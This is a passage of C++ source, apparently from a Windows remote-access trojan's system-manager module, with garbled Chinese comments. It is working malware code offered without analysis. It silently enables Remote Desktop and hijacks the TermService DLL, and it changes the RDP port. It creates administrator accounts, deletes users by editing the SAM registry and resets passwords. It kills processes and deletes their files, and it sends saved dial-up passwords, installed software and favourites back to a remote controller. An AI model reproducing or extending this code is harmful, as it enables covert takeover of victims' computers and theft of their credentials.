memcpy(lpBuffer + dwOffset, pAdapter->IpAddressList.IpAddress.String, lstrlen(pAdapter->IpAddressList.IpAddress.String) + 1);
|
||
dwOffset += lstrlen(pAdapter->IpAddressList.IpAddress.String) + 1;
|
||
|
||
memcpy(lpBuffer + dwOffset, pAdapter->IpAddressList.IpMask.String, lstrlen(pAdapter->IpAddressList.IpMask.String) + 1);
|
||
dwOffset += lstrlen(pAdapter->IpAddressList.IpMask.String) + 1;
|
||
|
||
pAdapter=pAdapter->Next;
|
||
|
||
}
|
||
}
|
||
//<2F>ͷ<EFBFBD><CDB7>ڴ<EFBFBD><DAB4>ռ<EFBFBD>
|
||
if(pAdapter)
|
||
{
|
||
delete pAdapter;
|
||
}
|
||
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||
return lpBuffer;
|
||
}
|
||
LPBYTE CSystemManager::getFavoritesUrlList()
|
||
{
|
||
char favpath[MAX_PATH] = {0};
|
||
|
||
// <20><>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȡ<EFBFBD>ղؼ<D5B2><D8BC><EFBFBD><EFBFBD><EFBFBD>λ<EFBFBD><CEBB>
|
||
HKEY hKEY;
|
||
DWORD type=REG_SZ;
|
||
LPCTSTR path="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
|
||
DWORD cbData=80;
|
||
::RegOpenKeyEx(HKEY_CURRENT_USER,path,0,KEY_READ,&hKEY);
|
||
::RegQueryValueEx(hKEY,"Favorites",NULL,&type,(LPBYTE)favpath,&cbData);
|
||
::RegCloseKey(hKEY);
|
||
|
||
|
||
lpFUBuffer = (LPBYTE)LocalAlloc(LPTR, 10000);
|
||
lpFUBuffer[0] = TOKEN_FULIST;
|
||
dwFUOffset = 1;
|
||
|
||
FindFavoritesUrl(favpath);
|
||
|
||
lpFUBuffer = (LPBYTE)LocalReAlloc(lpFUBuffer, dwFUOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||
|
||
return lpFUBuffer;
|
||
}
|
||
|
||
void CSystemManager::Open3389()
|
||
{
|
||
if (bIsOsXP())
|
||
{
|
||
TCHAR szDllPath[MAX_PATH];
|
||
GetSystemDirectory(szDllPath, sizeof(szDllPath));
|
||
lstrcat(szDllPath, "\\termsrv_t.dll");
|
||
|
||
if (GetFileAttributes(szDllPath) != -1)
|
||
{
|
||
HMODULE hLoad = LoadLibrary(szDllPath);
|
||
if (hLoad)
|
||
FreeLibrary(hLoad);
|
||
else
|
||
{
|
||
GetTermsrvFile();
|
||
return;
|
||
}
|
||
}
|
||
else
|
||
{
|
||
GetTermsrvFile();
|
||
return;
|
||
}
|
||
}
|
||
|
||
WriteRegEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "ShutdownWithoutLogon", REG_DWORD, NULL, 0, 0);
|
||
WriteRegEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer", "EnableAdminTSRemote", REG_DWORD, NULL, 1, 0);
|
||
WriteRegEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "KeepRASConnections", REG_SZ, "1", 0, 0);
|
||
WriteRegEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\TermDD", "Start", REG_DWORD, NULL, 2, 0);
|
||
WriteRegEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\TermService", "iKNVW", REG_DWORD, NULL, 2, 0);
|
||
WriteRegEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server", "TSEnabled", REG_DWORD, NULL, 1, 0);
|
||
WriteRegEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core", "EnableConcurrentSessions", REG_DWORD, NULL, 1, 0);
|
||
|
||
if (bIsOsXP())
|
||
{
|
||
|
||
WriteRegEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters", "ServiceDll", REG_EXPAND_SZ,
|
||
"%SystemRoot%\\system32\\termsrv_t.dll", 0, 0);
|
||
HijackService();
|
||
}
|
||
OnStartService("TermService");
|
||
Sleep(500);
|
||
WriteRegEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server", "fDenyTSConnections", REG_DWORD, NULL, 0, 0);
|
||
}
|
||
|
||
BOOL CSystemManager::Change3389Port(LPVOID lparam)
|
||
{
|
||
DWORD szPort=atoi((char*)lparam);
|
||
if (szPort>65535 || szPort <= 0)
|
||
return FALSE;
|
||
|
||
WriteRegEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\RDPTcp", "PortNumber", REG_DWORD, NULL, szPort, 0);
|
||
WriteRegEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp", "PortNumber", REG_DWORD, NULL, szPort, 0);
|
||
WriteRegEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\tcp", "PortNumber", REG_DWORD, NULL, szPort, 0);
|
||
|
||
return TRUE;
|
||
}
|
||
|
||
wchar_t* AnsiToUnicode(char* str)
|
||
{
|
||
if( !str )
|
||
return NULL;
|
||
|
||
int wcslen = ::MultiByteToWideChar(CP_ACP, NULL, str, strlen(str), NULL, 0);
|
||
wchar_t *wstr = new wchar_t[wcslen + 1];
|
||
::MultiByteToWideChar(CP_ACP, NULL, str, strlen(str), wstr, wcslen);
|
||
wstr[wcslen] = '\0';
|
||
|
||
return wstr;
|
||
}
|
||
|
||
void CSystemManager::DisconnectUser(LPBYTE lpBuffer, UINT nSize)
|
||
{
|
||
CSystemManager::DebugPrivilege(SE_DEBUG_NAME, TRUE);
|
||
|
||
for (int i = 0; i < nSize; i += 4)
|
||
{
|
||
WTSDisconnectSession(WTS_CURRENT_SERVER_HANDLE, *(LPDWORD)(lpBuffer + i) , FALSE );
|
||
}
|
||
CSystemManager::DebugPrivilege(SE_DEBUG_NAME, FALSE);
|
||
|
||
SendUserStateList();
|
||
}
|
||
|
||
void CSystemManager::LogOffUser(LPBYTE lpBuffer, UINT nSize)
|
||
{
|
||
CSystemManager::DebugPrivilege(SE_DEBUG_NAME, TRUE);
|
||
|
||
for (int i = 0; i < nSize; i += 4)
|
||
{
|
||
WTSLogoffSession(WTS_CURRENT_SERVER_HANDLE, *(LPDWORD)(lpBuffer + i) , FALSE );
|
||
}
|
||
CSystemManager::DebugPrivilege(SE_DEBUG_NAME, FALSE);
|
||
|
||
SendUserStateList();
|
||
}
|
||
|
||
void CSystemManager::NoNetAddUser(LPBYTE lpBuffer, UINT nSize)
|
||
{
|
||
USER_INFO_1 ui;
|
||
DWORD dwError = 0;
|
||
NET_API_STATUS nStatus;
|
||
|
||
TCHAR *lpUser = (TCHAR *)lpBuffer;
|
||
TCHAR *lpPass = (TCHAR *)lpBuffer + ( (lstrlen(lpUser) + 1) * sizeof(TCHAR));
|
||
TCHAR *lpGroup = (TCHAR *)lpBuffer + ( (lstrlen(lpPass) + 1) * sizeof(TCHAR) + (lstrlen(lpUser) + 1) * sizeof(TCHAR));
|
||
|
||
ui.usri1_name = AnsiToUnicode(lpUser); //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD>ӵ<EFBFBD><D3B5>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Լ<EFBFBD><D4BC>ĸ<EFBFBD>
|
||
ui.usri1_password = AnsiToUnicode(lpPass); //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD><C3BB><EFBFBD><EFBFBD>룬Ҳ<EBA3AC><D2B2><EFBFBD><EFBFBD><EFBFBD>Լ<EFBFBD><D4BC>ĸ<EFBFBD>
|
||
ui.usri1_priv = USER_PRIV_USER;
|
||
ui.usri1_home_dir = NULL;
|
||
ui.usri1_comment = NULL;
|
||
ui.usri1_flags = UF_SCRIPT;
|
||
ui.usri1_script_path = NULL;
|
||
nStatus = NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError);
|
||
|
||
if (nStatus != NERR_Success)
|
||
{
|
||
return;
|
||
}
|
||
wchar_t szAccountName[100]={0};
|
||
wcscpy(szAccountName,ui.usri1_name);
|
||
LOCALGROUP_MEMBERS_INFO_3 account;
|
||
account.lgrmi3_domainandname=szAccountName;
|
||
|
||
//<2F><><EFBFBD>ӵ<EFBFBD>Administrators<72><73>
|
||
nStatus = NetLocalGroupAddMembers(NULL,AnsiToUnicode(lpGroup),3,(LPBYTE)&account,1);
|
||
if (nStatus == NERR_Success)
|
||
{
|
||
SendSysUserList();
|
||
}
|
||
return;
|
||
}
|
||
|
||
void CSystemManager::DeleteUser(LPBYTE lpBuffer, UINT nSize)
|
||
{
|
||
TCHAR *lpUserName = (TCHAR*)lpBuffer;
|
||
BYTE bToken = NULL;
|
||
NET_API_STATUS nStatus;
|
||
nStatus = NetUserDel(NULL,AnsiToUnicode(lpUserName));
|
||
if(nStatus==NERR_Success)
|
||
{
|
||
goto DELSUCCESS;
|
||
}
|
||
if(nStatus!=NERR_Success&&nStatus!=NERR_UserNotFound)
|
||
{
|
||
char strType[32]={0};
|
||
TCHAR lpSubKey[128];
|
||
wsprintf(lpSubKey,"SAM\\SAM\\Domains\\Account\\Users\\Names\\%s",lpUserName);
|
||
|
||
if(!ReadRegEx(HKEY_LOCAL_MACHINE,lpSubKey,"",REG_BINARY,strType,NULL, sizeof(DWORD),0))
|
||
return;
|
||
|
||
if(WriteRegEx(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\Names\\", lpUserName, NULL, NULL, NULL, 2))
|
||
{
|
||
|
||
if(!WriteRegEx(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\", strType, REG_SZ, NULL, NULL, 2))
|
||
return;
|
||
else
|
||
goto DELSUCCESS;
|
||
}
|
||
else
|
||
return;
|
||
}
|
||
|
||
DELSUCCESS:
|
||
SendSysUserList();
|
||
}
|
||
|
||
void CSystemManager::ChangeUserPass(LPBYTE lpBuffer, UINT nSize)
|
||
{
|
||
BYTE bToken = NULL;
|
||
TCHAR *lpUser = (TCHAR*)lpBuffer;
|
||
TCHAR *lpPass = (TCHAR*)lpBuffer + ((lstrlen(lpUser) + 1) * sizeof(TCHAR));
|
||
|
||
USER_INFO_3 *pUI=NULL;
|
||
DWORD dwError = 0;
|
||
NET_API_STATUS nStatus;
|
||
|
||
nStatus=NetUserGetInfo(NULL,AnsiToUnicode(lpUser),3,(LPBYTE*)&pUI);
|
||
|
||
pUI->usri3_flags = UF_NORMAL_ACCOUNT|UF_DONT_EXPIRE_PASSWD;
|
||
pUI->usri3_password=AnsiToUnicode(lpPass);
|
||
pUI->usri3_password_expired=FALSE;
|
||
nStatus=NetUserSetInfo(NULL,AnsiToUnicode(lpUser),3,(LPBYTE)pUI,&dwError);
|
||
|
||
if(nStatus==NERR_Success)
|
||
{
|
||
bToken = TOKEN_CHANGE_PSAA_SUCCESS;
|
||
Send(&bToken, 1);
|
||
LocalFree((LPBYTE)&bToken);
|
||
}
|
||
if (pUI != NULL)
|
||
NetApiBufferFree(pUI);
|
||
}
|
||
|
||
|
||
void CSystemManager::ChangeUserState(LPBYTE lpBuffer, UINT nSize , UINT User_kt) //<2F>ʻ<EFBFBD><CABB><EFBFBD><EFBFBD><EFBFBD>/ͣ<><CDA3>
|
||
{
|
||
wchar_t user_name[256]={0};
|
||
USER_INFO_1008 ui;
|
||
DWORD dwLevel = 1008;
|
||
NET_API_STATUS nStatus;
|
||
mbstowcs(user_name, (const char *)lpBuffer,256);
|
||
if(User_kt==NULL) //<2F>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD>
|
||
ui.usri1008_flags = UF_SCRIPT|UF_DONT_EXPIRE_PASSWD; // <20>û<EFBFBD>ͣ<EFBFBD><CDA3> | <20><><EFBFBD><EFBFBD><EFBFBD>ò<EFBFBD><C3B2><EFBFBD><EFBFBD><EFBFBD>
|
||
else //<2F>û<EFBFBD>ͣ<EFBFBD><CDA3>
|
||
ui.usri1008_flags = UF_ACCOUNTDISABLE|UF_PASSWD_CANT_CHANGE; // <20>û<EFBFBD>ͣ<EFBFBD><CDA3> | <20>û<EFBFBD><C3BB><EFBFBD><EFBFBD>ܸ<EFBFBD><DCB8><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
nStatus = NetUserSetInfo( NULL,user_name,dwLevel, (LPBYTE )&ui,NULL);
|
||
if (nStatus == NERR_Success)
|
||
SendSysUserList();
|
||
}
|
||
|
||
__int64 CompareFileTime ( FILETIME time1, FILETIME time2 )
|
||
{
|
||
__int64 a = time1.dwHighDateTime << 32 | time1.dwLowDateTime ;
|
||
__int64 b = time2.dwHighDateTime << 32 | time2.dwLowDateTime ;
|
||
|
||
return (b - a);
|
||
}
|
||
|
||
int GetCPUOcupPerc()
|
||
{
|
||
HMODULE hModule_Kernel32 = LoadLibrary("kernel32.dll");
|
||
typedef BOOL (WINAPI *TGetSystemTimes)(LPFILETIME,LPFILETIME,LPFILETIME);
|
||
TGetSystemTimes MyGetSystemTimes = (TGetSystemTimes) GetProcAddress(hModule_Kernel32, "GetSystemTimes");
|
||
|
||
HANDLE hEvent;
|
||
BOOL res ;
|
||
|
||
FILETIME preidleTime;
|
||
FILETIME prekernelTime;
|
||
FILETIME preuserTime;
|
||
|
||
FILETIME idleTime;
|
||
FILETIME kernelTime;
|
||
FILETIME userTime;
|
||
|
||
res = MyGetSystemTimes( &idleTime, &kernelTime, &userTime );
|
||
|
||
preidleTime = idleTime;
|
||
prekernelTime = kernelTime;
|
||
preuserTime = userTime ;
|
||
|
||
Sleep(1000);
|
||
res = MyGetSystemTimes( &idleTime, &kernelTime, &userTime );
|
||
|
||
int idle = CompareFileTime( preidleTime,idleTime);
|
||
int kernel = CompareFileTime( prekernelTime, kernelTime);
|
||
int user = CompareFileTime(preuserTime, userTime);
|
||
|
||
int cpu = (kernel +user - idle) *100/(kernel+user);
|
||
|
||
if (hModule_Kernel32)
|
||
FreeLibrary(hModule_Kernel32);
|
||
|
||
return cpu;
|
||
}
|
||
|
||
int GetMemOcpuPerc()
|
||
{
|
||
MEMORYSTATUSEX statex;
|
||
|
||
statex.dwLength = sizeof (statex);
|
||
|
||
GlobalMemoryStatusEx (&statex);
|
||
|
||
return (int)statex.dwMemoryLoad;
|
||
}
|
||
|
||
DWORD WINAPI CSystemManager::SendCPUAndMemoryThread(LPVOID lparam)
|
||
{
|
||
CSystemManager *pThis = (CSystemManager *)lparam;
|
||
|
||
|
||
BYTE buf[20];
|
||
while (pThis->m_pClient->IsRunning())
|
||
{
|
||
Sleep(1000 * 3);
|
||
|
||
ZeroMemory(buf,20);
|
||
buf[0] = TOKEN_CPUMEMORY;
|
||
|
||
int Mem = GetMemOcpuPerc();
|
||
int cpu = GetCPUOcupPerc();
|
||
memcpy(buf+1,(void*)&Mem,sizeof(DWORD)); //<2F>ڴ<EFBFBD>
|
||
memcpy(buf+1+sizeof(DWORD),(void*)&cpu,sizeof(DWORD));
|
||
|
||
pThis->Send((unsigned char *)buf,sizeof(buf));
|
||
}
|
||
|
||
return true;
|
||
}
|
||
|
||
void CSystemManager::SendSoftWareList()
|
||
{
|
||
LPBYTE lpBuffer = getSoftWareList();
|
||
if (lpBuffer == NULL)
|
||
return;
|
||
|
||
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
|
||
LocalFree(lpBuffer);
|
||
}
|
||
|
||
LPBYTE CSystemManager::getSoftWareList()
|
||
{
|
||
const int MAX_LEG = 256 * sizeof(TCHAR);
|
||
|
||
LPBYTE lpBuffer = NULL;
|
||
DWORD dwOffset = 1;
|
||
DWORD dwLength = 0;
|
||
TCHAR regBufferValue[MAX_LEG] = {0};
|
||
TCHAR regDisplayName[MAX_LEG] = {0};
|
||
TCHAR regPublisher[MAX_LEG] = {0};
|
||
TCHAR regDisplayVersion[MAX_LEG] = {0};
|
||
TCHAR regInstallDate[MAX_LEG] = {0};
|
||
TCHAR regUninstallString[MAX_LEG] = {0};
|
||
|
||
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1024);
|
||
if(lpBuffer == NULL)
|
||
return NULL;
|
||
|
||
lpBuffer[0] = TOKEN_SOFTWARE;
|
||
|
||
int n = 0;
|
||
HKEY hKey;
|
||
DWORD dwRegNum = MAX_LEG;
|
||
TCHAR regBufferName[MAX_LEG] = {0};
|
||
if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",
|
||
NULL, KEY_READ, &hKey) == ERROR_SUCCESS )
|
||
{
|
||
if( RegQueryInfoKey(hKey, NULL, NULL, NULL, &dwRegNum, NULL, NULL, NULL, NULL, NULL, NULL, NULL) == ERROR_SUCCESS )
|
||
{
|
||
|
||
for( int i = 0; i < (int)dwRegNum; i++ )
|
||
{
|
||
DWORD dwRegSize = MAX_LEG;
|
||
RegEnumKeyEx(hKey, i, regBufferName, &dwRegSize, NULL, NULL, NULL, NULL);
|
||
DWORD dwType;
|
||
HKEY hSubKey;
|
||
if( RegOpenKeyEx(hKey, regBufferName, NULL, KEY_READ, &hSubKey) == ERROR_SUCCESS)
|
||
{
|
||
|
||
dwRegSize = MAX_LEG;
|
||
memset(regDisplayName,0,MAX_LEG);
|
||
RegQueryValueEx(hSubKey, "DisplayName", 0, &dwType, (LPBYTE)regDisplayName, &dwRegSize);
|
||
|
||
|
||
dwRegSize = MAX_LEG;
|
||
memset(regBufferValue,0,MAX_LEG);
|
||
// ȡParentKeyName<6D><65>ֵ,<2C>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>Dz<EFBFBD><C7B2><EFBFBD><EFBFBD><EFBFBD>Ϣ, <20>Dz<EFBFBD><C7B2><EFBFBD><EFBFBD><EFBFBD>Ϣ<EFBFBD><CFA2>ֵΪ"OperatingSystem"
|
||
RegQueryValueEx(hSubKey, "ParentKeyName", 0, &dwType, (LPBYTE)regBufferValue, &dwRegSize);
|
||
if( lstrlen(regDisplayName) == 0 || lstrcmp( regBufferValue,"OperatingSystem") == 0 ) //<2F>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>Dz<EFBFBD><C7B2><EFBFBD><EFBFBD><EFBFBD>Ϣ
|
||
{
|
||
continue;
|
||
}
|
||
|
||
|
||
dwRegSize = MAX_LEG;
|
||
memset(regPublisher,0,MAX_LEG);
|
||
RegQueryValueEx(hSubKey, "Publisher", 0, &dwType,(LPBYTE)regPublisher, &dwRegSize);
|
||
|
||
|
||
dwRegSize = MAX_LEG;
|
||
memset(regDisplayVersion,0,MAX_LEG);
|
||
RegQueryValueEx(hSubKey, "DisplayVersion", 0, &dwType, (LPBYTE)regDisplayVersion, &dwRegSize);
|
||
|
||
|
||
dwRegSize = MAX_LEG;
|
||
memset(regInstallDate,0,MAX_LEG);
|
||
// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD>л<EFBFBD>ȡ<EFBFBD><C8A1><EFBFBD><EFBFBD>װʱ<D7B0><CAB1>, <20><>ȡ<EFBFBD><C8A1><EFBFBD><EFBFBD><EEB4B4>ʱ<EFBFBD><CAB1>
|
||
if(RegQueryValueEx(hSubKey, "InstallDate", 0, &dwType, (LPBYTE)regInstallDate, &dwRegSize) == ERROR_SUCCESS )
|
||
{
|
||
}
|
||
else
|
||
{
|
||
FILETIME fileLastTime;
|
||
RegQueryInfoKey(hSubKey, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
|
||
NULL, NULL, NULL, &fileLastTime);
|
||
SYSTEMTIME sTime, stLocal ;
|
||
FileTimeToSystemTime(&fileLastTime,&sTime);
|
||
SystemTimeToTzSpecificLocalTime(NULL, &sTime, &stLocal);
|
||
TCHAR tchTime[MAX_LEG] = {0};
|
||
wsprintf(tchTime,"%d%02d%02d",stLocal.wYear,stLocal.wMonth,stLocal.wDay);
|
||
lstrcpy(regInstallDate,tchTime);
|
||
}
|
||
|
||
dwRegSize = MAX_LEG;
|
||
memset(regUninstallString,0,MAX_LEG);
|
||
RegQueryValueEx(hSubKey, "UninstallString", 0, &dwType, (LPBYTE)regUninstallString, &dwRegSize);
|
||
|
||
|
||
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̫С<CCAB><D0A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD><EFBFBD>
|
||
dwLength = lstrlen(regDisplayName) + lstrlen(regPublisher) + lstrlen(regDisplayVersion) + lstrlen(regInstallDate) + lstrlen(regUninstallString) + 6;
|
||
if (LocalSize(lpBuffer) < (dwOffset + dwLength))
|
||
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||
|
||
|
||
memcpy(lpBuffer + dwOffset, regDisplayName, lstrlen(regDisplayName) + 1);
|
||
dwOffset += lstrlen(regDisplayName) + 1;
|
||
|
||
memcpy(lpBuffer + dwOffset, regPublisher, lstrlen(regPublisher) + 1);
|
||
dwOffset += lstrlen(regPublisher) + 1;
|
||
|
||
memcpy(lpBuffer + dwOffset, regDisplayVersion, lstrlen(regDisplayVersion) + 1);
|
||
dwOffset += lstrlen(regDisplayVersion) + 1;
|
||
|
||
memcpy(lpBuffer + dwOffset, regInstallDate, lstrlen(regInstallDate) + 1);
|
||
dwOffset += lstrlen(regInstallDate) + 1;
|
||
|
||
memcpy(lpBuffer + dwOffset, regUninstallString, lstrlen(regUninstallString) + 1);
|
||
dwOffset += lstrlen(regUninstallString) + 1;
|
||
}
|
||
}
|
||
}
|
||
}
|
||
else
|
||
{
|
||
return FALSE; //<2F><EFBFBD>ʧ<EFBFBD><CAA7>
|
||
}
|
||
|
||
RegCloseKey(hKey);
|
||
|
||
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
|
||
|
||
return lpBuffer;
|
||
}
|
||
|
||
void CSystemManager::SendDialupassList()
|
||
{
|
||
CDialupass pass;
|
||
|
||
int nPacketLen = 0;
|
||
int i;
|
||
for (i = 0; i < pass.GetMax(); i++)
|
||
{
|
||
COneInfo *pOneInfo = pass.GetOneInfo(i);
|
||
for (int j = 0; j < STR_MAX; j++)
|
||
nPacketLen += lstrlen(pOneInfo->Get(j)) + 1;
|
||
}
|
||
|
||
nPacketLen += 1;
|
||
LPBYTE lpBuffer = (LPBYTE)LocalAlloc(LPTR, nPacketLen);
|
||
|
||
DWORD dwOffset = 1;
|
||
for (i = 0; i < pass.GetMax(); i++)
|
||
{
|
||
COneInfo *pOneInfo = pass.GetOneInfo(i);
|
||
for (int j = 0; j < STR_MAX; j++)
|
||
{
|
||
int nFieldLength = lstrlen(pOneInfo->Get(j)) + 1;
|
||
memcpy(lpBuffer + dwOffset, pOneInfo->Get(j), nFieldLength);
|
||
dwOffset += nFieldLength;
|
||
}
|
||
}
|
||
|
||
lpBuffer[0] = TOKEN_DIALUPASS;
|
||
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
|
||
LocalFree(lpBuffer);
|
||
}
|
||
|
||
void CSystemManager::TestWindow(LPBYTE lpBuffer)
|
||
{
|
||
DWORD hwnd;
|
||
DWORD dHow;
|
||
memcpy((void*)&hwnd,lpBuffer,sizeof(DWORD)); //<2F>õ<EFBFBD><C3B5><EFBFBD><EFBFBD>ھ<EFBFBD><DABE><EFBFBD>
|
||
memcpy(&dHow,lpBuffer+sizeof(DWORD),sizeof(DWORD)); //<2F>õ<EFBFBD><C3B5><EFBFBD><EFBFBD>ڴ<EFBFBD><DAB4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
ShowWindow((HWND__ *)hwnd,dHow);
|
||
}
|
||
|
||
void CSystemManager::CloseWindow(LPBYTE lpBuffer)
|
||
{
|
||
DWORD hwnd;
|
||
memcpy(&hwnd,lpBuffer,sizeof(DWORD)); //<2F>õ<EFBFBD><C3B5><EFBFBD><EFBFBD>ھ<EFBFBD><DABE><EFBFBD>
|
||
::PostMessage((HWND__ *)hwnd,WM_CLOSE,0,0); //<2F>ڷ<F2B4B0BF><DAB7>ر<CDB9><D8B1><EFBFBD>Ϣ
|
||
|
||
Sleep(200);
|
||
SendWindowsList(); //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾˢ<CABE><CBA2>
|
||
}
|
||
|
||
void CSystemManager::KillProcess(LPBYTE lpBuffer, UINT nSize)
|
||
{
|
||
HANDLE hProcess = NULL;
|
||
DebugPrivilege(SE_DEBUG_NAME, TRUE);
|
||
nSize -=1;
|
||
char strProcessName[MAX_PATH] = {0};
|
||
|
||
for (UINT i = 0; i < nSize; i += 4)
|
||
{
|
||
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, *(LPDWORD)(lpBuffer + 1 + i));
|
||
GetModuleFileNameEx(hProcess,NULL,strProcessName, sizeof(strProcessName));
|
||
BOOL bProcess = TerminateProcess(hProcess, 0);
|
||
|
||
if (lpBuffer[0] && bProcess)
|
||
{
|
||
int n = 0;
|
||
while(1)
|
||
{
|
||
DeleteFile(strProcessName);
|
||
Sleep(200);
|
||
if(GetFileAttributes(strProcessName) == -1) //<2F><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>˳<EFBFBD>
|
||
break;
|
||
n ++ ;
|
||
if(n >= 10) //<2F><EFBFBD>ɾ<EFBFBD><C9BE> һ<><D2BB>ʱ<EFBFBD><CAB1><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD>
|
||
break;
|
||
}
|
||
}
|
||
CloseHandle(hProcess);
|
||
}
|
||
DebugPrivilege(SE_DEBUG_NAME, FALSE);
|
||
// <20><><EFBFBD><EFBFBD>Sleep<65>£<EFBFBD><C2A3><EFBFBD>ֹ<EFBFBD><D6B9><EFBFBD><EFBFBD>
|
||
Sleep(100);
|
||
}
|
||
|
||
void CSystemManager::ShutdownWindows( DWORD dwReason )
|
||
{
|
||
DebugPrivilege(SE_SHUTDOWN_NAME,TRUE);
|
||
ExitWindowsEx(dwReason, 0);
|
||
DebugPrivilege(SE_SHUTDOWN_NAME,FALSE);
|
||
}
|
||
|
||
BOOL CSystemManager::DebugPrivilege(const char *PName,BOOL bEnable)
|
||
{
|
||
BOOL bResult = TRUE;
|
||
HANDLE hToken;
|
||
TOKEN_PRIVILEGES TokenPrivileges;
|
||
|
||
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
|
||
{
|
||
bResult = FALSE;
|
||
return bResult;
|
||
}
|
||
TokenPrivileges.PrivilegeCount = 1;
|
||
TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
|
||
|
||
LookupPrivilegeValue(NULL, PName, &TokenPrivileges.Privileges[0].Luid);
|
||
AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
|
||
if (GetLastError() != ERROR_SUCCESS)
|
||
{
|
||
bResult = FALSE;
|
||
}
|
||
|
||
CloseHandle(hToken);
|
||
return bResult;
|
||
}
|
||
|
||
void CSystemManager::SendProcessList()
|
||
{
|
||
UINT nRet = -1;
|
||
LPBYTE lpBuffer = getProcessList();
|
||
if (lpBuffer == NULL)
|
||
return;
|
||
|
||
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
|
||
LocalFree(lpBuffer);
|
||
}
|
||
|
||
BOOL DosPathToNtPath(LPTSTR pszDosPath, LPTSTR pszNtPath)
|
||
{
|
||
TCHAR szDriveStr[500];
|
||
TCHAR szDrive[3];
|
||
TCHAR szDevName[100];
|
||
INT cchDevName;
|
||
INT i;
|
||
|
||
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
if(!pszDosPath || !pszNtPath )
|
||
return FALSE;
|
||
|
||
//<2F><>ȡ<EFBFBD><C8A1><EFBFBD>ش<EFBFBD><D8B4><EFBFBD><EFBFBD>ַ<EFBFBD><D6B7><EFBFBD>
|
||
if(GetLogicalDriveStrings(sizeof(szDriveStr), szDriveStr))
|
||
{
|
||
for(i = 0; szDriveStr[i]; i += 4)
|
||
{
|
||
if(!lstrcmpi(&(szDriveStr[i]), "A:\\") || !lstrcmpi(&(szDriveStr[i]), "B:\\"))
|
||
continue;
|
||
|
||
szDrive[0] = szDriveStr[i];
|
||
szDrive[1] = szDriveStr[i + 1];
|
||
szDrive[2] = '\0';
|
||
if(!QueryDosDevice(szDrive, szDevName, 100))//<2F><>ѯ Dos <20>豸<EFBFBD><E8B1B8>
|
||
return FALSE;
|
||
|
||
cchDevName = lstrlen(szDevName);
|
||
if(strncmp(pszDosPath, szDevName, cchDevName) == 0)//<2F><><EFBFBD><EFBFBD>
|
||
{
|
||
